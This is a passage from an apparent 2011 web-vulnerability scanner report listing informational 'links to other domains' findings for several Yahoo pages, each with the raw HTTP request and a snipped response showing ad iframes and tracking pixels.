<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128uvl23o(gid$az1wfGKIKoRUS8eSTmYV9iI5Mhd7ak5mFfcAAjI2,st$1315313143158494,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.79. http://maps.yahoo.com/darla_fc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.yahoo.com
Path:   /darla_fc

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /darla_fc?cb=YAHOO.ads.darla._loaded&p=maps&f=2022332404&l=LREC&en=utf-8&rn=1315331355624&em=%7B%22site-attribute%22%3A%22content%3Dno_expandable%3Bajax_cert_expandable%22%2C%22ad-logoption%22%3A%22NOPAGEVIEW%22%7D&t_e=1&.intl=us HTTP/1.1
Host: maps.yahoo.com
Proxy-Connection: keep-alive
Referer: http://maps.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; _ygms=z%5E6%26l%5E350+Sansome+Street+San+Francisco+CA+94104+us%26v%5E1%26c%5E37.793676%7C-122.401025; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:15 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7583

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<div id=LREC><IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?_PVID=FAzBpWKIKoTpARpjTl.wjQ3ZMhd7ak5mFssADGvW&ad_type=iframe&ad_size=300x250&site=140469&section_code=14445103&cb=1315313355871397&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15p7umfii/M=787833.14445103.14291869.1659633/D=maps/S=2022332404:LREC/Y=YAHOO/EXP=1315320555/L=FAzBpWKIKoTpARpjTl.wjQ3ZMhd7ak5mFssADGvW/B=55j9KkoGYzQ-/J=1315313355871397/K=wAUe6WLorFCi06uKuG03Mw/A=6261227/R=0/*"></IFRAME>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128cr3pli(gid$FAzBpWKIKoTpARpjTl.wjQ3ZMhd7ak5mFssADGvW,st$1315313355829916,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.80. http://maps.yahoo.com/pvproxy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.yahoo.com
Path:   /pvproxy

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /pvproxy?r=0.10187717201188207&l=Data.changezoom HTTP/1.1
Host: maps.yahoo.com
Proxy-Connection: keep-alive
Referer: http://maps.yahoo.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; _ygms=z%5E6%26l%5E350+Sansome+Street+San+Francisco+CA+94104+us%26v%5E1%26c%5E37.793676%7C-122.401025; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:29 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: keep-alive, close
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 4141

<!-- SpaceID=2023723506 loc=Z noad -->
<script language=javascript>
if(window.yzq_d==null)window.yzq_d=new Object();
window.yzq_d['H9vHQkPDhFU-']='&U=129bsdqd2%2fN%3dH9vHQkPDhFU-%2fC%3d-1%2fD%3dZ%2fB%
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128ijja8f(gid$qdx1lGKIKoTpARpjTl.wjQxpMhd7ak5mFtkAABG6,st$1315313369054391,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.81. http://new.music.yahoo.com/recommendedHP/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://new.music.yahoo.com
Path:   /recommendedHP/

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /recommendedHP/?type=0&results=6&ts=1315331139646 HTTP/1.1
Host: new.music.yahoo.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; YMT=d=dj0xJnQ9MCZ0cz0xMzE1MjUxODE1&s=RKnJfnz7ookDnnWANSk9kA--; YMP_VOLUME=0.5; mlap_us=%7B%22d%22%3A%5B%5B%22yahooVideosContainer%22%2C%22ySearch%22%2C%22yMusicImages%22%2C%22yahooAlbums%22%2C%22yNews%22%2C%22Youtube%22%5D%2C%5B%22yahooTracksPopular%22%2C%22yConcerts%22%2C%22lastfm%22%2C%22pandora%22%2C%22flickr%22%2C%22iTunes%22%2C%22Amazon%22%5D%5D%2C%22m%22%3A%22%22%2C%22i%22%3A%22us%22%2C%22v%22%3A%221.1%22%2C%22c%22%3A0%7D; adxid=016e3b4e6615bdb5; BA=t=1315331123; adxf=3078081@1@223.1071929@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:05 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 4640


<div id="ymusicRecommendHp" class="ymusic-mod ymusic-mod-tab">
<div class="ymusic-mod-head">
<h2><a href="/recommended/;_ylt=Agd6h7luOXfMzgL1Te03aRSsvyUv" >Recommended</a></h2>

<ul id="y
...[SNIP]...
<a href="Burning-Spear/videos/view/Burning-Reggae--2139897;_ylt=AtKeNbVIhv7F9PBJ86Gt8V.svyUv" class="ymusic-img-link ymusic-img-play-overlay"><img src="http://d.yimg.com/ec/image/v1/video/2139897;encoding=jpg;size=146x88"><span>
...[SNIP]...
<a href="Burning-Spear/videos/view/Subject-In-School--2139896;_ylt=An6dTq_EOIRr_N9QDBuwo4msvyUv" class="ymusic-img-link ymusic-img-play-overlay"><img src="http://d.yimg.com/ec/image/v1/video/2139896;encoding=jpg;size=146x88"><span>
...[SNIP]...
<a href="Burning-Spear/videos/view/Not-Stupid--2139899;_ylt=Atue.tTMDFdVD8FxoymaojasvyUv" class="ymusic-img-link ymusic-img-play-overlay"><img src="http://d.yimg.com/ec/image/v1/video/2139899;encoding=jpg;size=146x88"><span>
...[SNIP]...
<a href="Burning-Spear/videos/view/Mi-Gi-Dem--2139898;_ylt=ArKNOGkC6BzRtdH0876f_iusvyUv" class="ymusic-img-link ymusic-img-play-overlay"><img src="http://d.yimg.com/ec/image/v1/video/2139898;encoding=jpg;size=146x88"><span>
...[SNIP]...
<a href="UB40/videos/view/Sing-Our-Own-Song--2148569;_ylt=AozEBT6vFOeN6StBgMRBpn.svyUv" class="ymusic-img-link ymusic-img-play-overlay"><img src="http://d.yimg.com/ec/image/v1/video/2148569;encoding=jpg;size=146x88"><span>
...[SNIP]...
<a href="UB40/videos/view/Don't-Break-My-Heart--2148568;_ylt=Ake6Y6iEqkxkkl274lQ1NVusvyUv" class="ymusic-img-link ymusic-img-play-overlay"><img src="http://d.yimg.com/ec/image/v1/video/2148568;encoding=jpg;size=146x88"><span>
...[SNIP]...

15.82. http://omg.yahoo.com/xhr/ad/LREC/2115806991

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omg.yahoo.com
Path:   /xhr/ad/LREC/2115806991

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /xhr/ad/LREC/2115806991?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; BA=t=1315331123; adxf=3078081@1@223.1071929@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:42 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.5
Content-Length: 4999

<html><body><IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?_PVID=mHDg8mKIOPrpARpjTl.wjQhBMhd7ak5mFjIABjlT&ad_type=iframe&ad_size=300x250&site=148950&section_code=14445112&cb=1315313202464541&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15rl4ferg/M=787833.14445112.14291879.10366300/D=o_m_g/S=2115806991:LREC/Y=YAHOO/EXP=1315320402/L=mHDg8mKIOPrpARpjTl.wjQhBMhd7ak5mFjIABjlT/B=EE4oQ9BDRvY-/J=1315313202464541/K=kbp5aQiA4RbwMhDPKbyZmw/A=6261235/R=0/*"></IFRAME>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128gso9ed(gid$mHDg8mKIOPrpARpjTl.wjQhBMhd7ak5mFjIABjlT,st$1315313202419540,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.83. http://pixel.everesttech.net/2565/c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /2565/c

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /2565/c?ev_ct=d&ev_sid=54&ev_ci=1660002714&ev_ai=1660082513&ev_cri=1660643811&url=http%3A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%3Futm_source%3Dyhofin%26utm_medium%3Dpaid-banner-ads%26utm_campaign%3D120x60-QuotesBttn%26utm_content%3Dstock%3AoldGrnBlk HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gglck=zqROZUBXyFQAAIdR; everest_session_v2=AXNOZhaIGXMAAIM3; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:48:34 GMT
Server: Apache
Set-Cookie: everest_session_v2=AXNOZhaIGXMAAIM3; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Tue, 10-Sep-2030 23:28:34 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Location: http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk
Content-Length: 364
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&amp;utm_medium=paid-banner-ads&amp;utm_campaign=120x60-QuotesBttn&amp;utm_content=stock:oldGrnBlk">here</a>
...[SNIP]...

15.84. http://pro.tweetmeme.com/button.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pro.tweetmeme.com
Path:   /button.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /button.js?url=http%3A%2F%2Fnew.music.yahoo.com%2Fblogs%2Flive%2F13348%2Fred-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video%2F&style=compact&service=bit.ly&t_sec=mit_share&t_act=retweet HTTP/1.1
Host: pro.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 06 Sep 2011 12:49:45 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-Url-Lookup: OrAdd (156)
X-Pro-Served-In: 0.0025007724761963
X-Served-By: h00
Content-Length: 6589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <meta content="tex
...[SNIP]...
</style>

<script type="text/javascript" src="http://l.yimg.com/d/combo?yui/3.1.1/build/yui/yui-min.js&amp;ult/ylc_1.9.js"></script>
...[SNIP]...

15.85. http://realestate.yahoo.com/darla/fc.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.yahoo.com
Path:   /darla/fc.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=realestate&f=750052199&l=LREC&en=utf-8&npv=1&rn=1315331397410&em=%7B%20%22site-country%22%3A%22us%22%2C%22site-state%22%3A%22ny%22%2C%22site-city%22%3A%22New%20York%22%2C%22site-dma%22%3A%22501%22%2C%22site-attribute%22%3A%22content%3Dno_expandable%22%20%7D HTTP/1.1
Host: realestate.yahoo.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160; PREF=srp=b%3D1%26p%3D10010%26type%3Dclassified%26radius%3D%26lat%3D40.714550%26lon%3D-74.007124%26datelisted%3D%26priceLow%3D0%26priceHigh%3DUnlimited%26bedroomLow%3D%26searchName%3D%26bathroomLow%3D%26sqLow%3D0%26sqHigh%3DUnlimited%26proptype%3Dall%26n%3D10%26view%3Dlist%26sortBy%3Dfeat

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:57 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 10089

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128r7oge8(gid$_bb7.mKJhxXpARpjTl.wjQ92Mhd7ak5mFvUABrnR,st$1315313397464980,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.86. http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.yahoo.com
Path:   /search/New_York/New_York/homes-for-sale

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search HTTP/1.1
Host: realestate.yahoo.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Cache-Control: private
Content-Length: 173778

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>10010 Real Estate & Homes for Sale, 10010 Houses - Yahoo! Real Estate</titl
...[SNIP]...
<meta http-equiv="content-type" content="text/html; charset=UTF-8">


<link rel="stylesheet" type="text/css" href="http://yre.zenfs.com/static/css/4.3.25/yui-container-201105112120.css" />
<link rel="stylesheet" type="text/css" href="http://yre.zenfs.com/static/css/4.3.25/overlay-201105112120.css" />
<link rel="stylesheet" type="text/css" href="http://l.yimg.com/zz/combo?d/lib/yui/2.5.2/build/reset/reset-min.css&d/lib/yui/2.7.0/build/fonts/fonts-min.css&qf/static/css/4.3.21/maple-global-201105050422.css&qf/static/css/4.3.21/map-201105050422.css&qf/static/css/4.3.25/srp-pdp-201105112313.css&qf/static/css/4.3.21/popup-201105050422.css&d/lib/uh/15/css/uh_rsa-1.0.5.css&qf/static/css/4.3.21/search-bar-srp-201105050422.css&qf/static/css/4.3.21/rss-201105050422.css&qf/static/css/4.3.32/listing-ad-201106170329.css&qf/static/css/4.3.21/showcasead-201105050422.css" />


<script type="text/javascript" charset="UTF-8">
...[SNIP]...
<div class="yre-header-ad">
<link type="text/css" rel="stylesheet" href="http://l.yimg.com/a/lib/uh/15/css/uh_rsa-1.0.5.css" /><style type="text/css">
...[SNIP]...
Qs/Y=YAHOO/EXP=1315320588/L=m_XwnmKJhxXpARpjTl.wjQ9iMhd7ak5mFuwABTk1/B=m6MMQ9BDRm0-/J=1315313388445399/K=NkcIGSxgkOZlr2zFxVzD3Q/A=5877330/R=11/SIG=10tmhot8e/*http://realestate.yahoo.com" target="_top"><img id="ygmalogoimg" width="294" height="26" src="http://l.yimg.com/a/i/brand/purplelogo/uh/us/realestate_final.gif" alt="Yahoo! Real Estate"></a>
...[SNIP]...
<div id="yrePriceSliderMin"><img src="http://l.yimg.com/d/lib/yre/mycs/d/img/0.0.2/slider-pointer-on-200809101702.gif" width="12" height="15" alt=""></div>
...[SNIP]...
<div id="yrePriceSliderMax"><img src="http://l.yimg.com/d/lib/yre/mycs/d/img/0.0.2/slider-pointer-on-200809101702.gif" width="12" height="15" alt=""></div>
...[SNIP]...
<div id="yreSqSliderMin"><img src="http://l.yimg.com/d/lib/yre/mycs/d/img/0.0.2/slider-pointer-on-200809101702.gif" alt=""></div>
...[SNIP]...
<div id="yreSqSliderMax"><img src="http://l.yimg.com/d/lib/yre/mycs/d/img/0.0.2/slider-pointer-on-200809101702.gif" alt=""></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/7b10885ba48b20f48bd77d522670fe5f/db0cc5a990cccac3b27d5fcf194bf4a3.jpg" alt="27 E 22ND ST FL 2ND home for sale "></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/d35c926e56ec811cde17683e34c6455a/c3763ca027cdef31df709f2dc347a440.jpg" alt="10 W End Ave # 23/24B home for sale "></div>
...[SNIP]...
<div class='logo hfs'><img src='http://e.yimg.com/pf/api/res/1.2/xFQI9kZVGa7Ygsf_p6wsGw--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9OTA7aD0zMDtxPTcw/http://images.partners-z.com/is/image/i0/i6/i4698/IS1k5do4y6k3gkj.jpg'/></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/2db8b748fc874c4427c7f9b4f0bc9876/884fab6b26afc258cdf943d0b0076924.jpg" alt="15 E 26TH ST APT 19D home for sale "></div>
...[SNIP]...
<div class='logo hfs'><img src='http://e.yimg.com/pf/api/res/1.2/xexGvxZreQ_WmR32QcVkOQ--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9OTA7aD0zMDtxPTcw/http://images.partners-z.com/is/image/i0/i0/i1983/ISye1hvz806y77.jpg'/></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/e31d882886c97ed0b1fd9ed3cda2b20/d6ed362d8a5fd16ca97453db3f2c38e3.jpg" alt="27 E 22nd St Apt 8 home for sale "></div>
...[SNIP]...
<div class='logo hfs'><img src='http://e.yimg.com/pf/api/res/1.2/xexGvxZreQ_WmR32QcVkOQ--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9OTA7aD0zMDtxPTcw/http://images.partners-z.com/is/image/i0/i0/i1983/ISye1hvz806y77.jpg'/></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/2bc17f9d99fe1e53e61d640af5b4ec/4555288afbd7c49ec918b66affc513a.jpg" alt="13-21 E 22ND ST 8E home for sale "></div>
...[SNIP]...
<div class='logo hfs'><img src='http://e.yimg.com/pf/api/res/1.2/xexGvxZreQ_WmR32QcVkOQ--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9OTA7aD0zMDtxPTcw/http://images.partners-z.com/is/image/i0/i0/i1983/ISye1hvz806y77.jpg'/></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/6c6450461cd0eca43686c33ba30543c/bc8b04eaf34c4e9e746a427347e63386.jpg" alt="50 Gramercy Park N Apt 6A home for sale "></div>
...[SNIP]...
<div class='logo hfs'><img src='http://e.yimg.com/pf/api/res/1.2/xexGvxZreQ_WmR32QcVkOQ--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9OTA7aD0zMDtxPTcw/http://images.partners-z.com/is/image/i0/i0/i1983/ISye1hvz806y77.jpg'/></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/3f9eff2674b55b7238430388cb67ce9/7b08496a0e698c5523d2191265bbfc33.jpg" alt="1 Lexington Ave # 5CD home for sale "></div>
...[SNIP]...
<div class='logo hfs'><img src='http://e.yimg.com/pf/api/res/1.2/xexGvxZreQ_WmR32QcVkOQ--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9OTA7aD0zMDtxPTcw/http://images.partners-z.com/is/image/i0/i0/i1983/ISye1hvz806y77.jpg'/></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/f49fe8ff4f584f4396c565dfda6241/bb56ad7c1119069b6c1bb1042a8eae1c.jpg" alt="305 E 24th St Apt 15K home for sale "></div>
...[SNIP]...
<div class='logo hfs'><img src='http://e.yimg.com/pf/api/res/1.2/xFQI9kZVGa7Ygsf_p6wsGw--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9OTA7aD0zMDtxPTcw/http://images.partners-z.com/is/image/i0/i6/i4698/IS1k5do4y6k3gkj.jpg'/></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/54ccaa0a2497eed21bcd352985173/cfe13699180f3c2aa5c14cf99856860f.jpg" alt="225 E 24th St # FL2 home for sale "></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/1d6fb1225f425f73fd6d557c6d525a2/65517c75900766d79356cd95c0617c70.jpg" alt="225 5th Ave Apt PHS home for sale "></div>
...[SNIP]...
</div>
<img src="http://iar.worthathousandwords.com/iar.gif?pid=9184"></img>
...[SNIP]...
<span class="ditto-img"><img src = http://cr0.worthathousandwords.com/9/50/43/86299B7715B8925213BA10322A7.jpg?pid=9184&qs=yvFTyvikq%7Dmhm%25Xhjp%27Fxzd%7Di-bi%7C%40%C2%80%7B%7E%2Fuxxmiuungo7gvn4xhjpltygwn%2A%7BuqCS%7Bykfszljp%27Sjgo%29Izufzh%2FhltBYhjvji%25Vu%7Ehloyodu%24Yffr%23Nw%7Bbyk%23osy%21Fro%29Pvdfr%23%5Bihm%25Kv%7De%7Bf%25Rl%7Cxpoly1 height = "50px" </img></span>
...[SNIP]...
<span class="ditto-img"><img src = http://cr0.worthathousandwords.com/3/EF/67/5B36E433543E980647648FB9955.jpg?pid=9184&qs=yvFVlbq%26H%7Cxhuj%26Qn%7B%27Ztxn%2FekwB%7Dz%C2%802jpqjznpscftnnv5dts%29%7Dxs%3EWkdu%24Ltygwn%24Uf%7C%26%5Cxvr%27ikvFZptnz%23Lsse%7Ckou%24Ibsqh%7B%C2%B2%27utjd%C2%82%24-%21xkh%29esm%25rl%7Cxpoly%23rr%27umux%7Ceuex%26ro%24hsjgv%2A height = "50px" </img></span>
...[SNIP]...
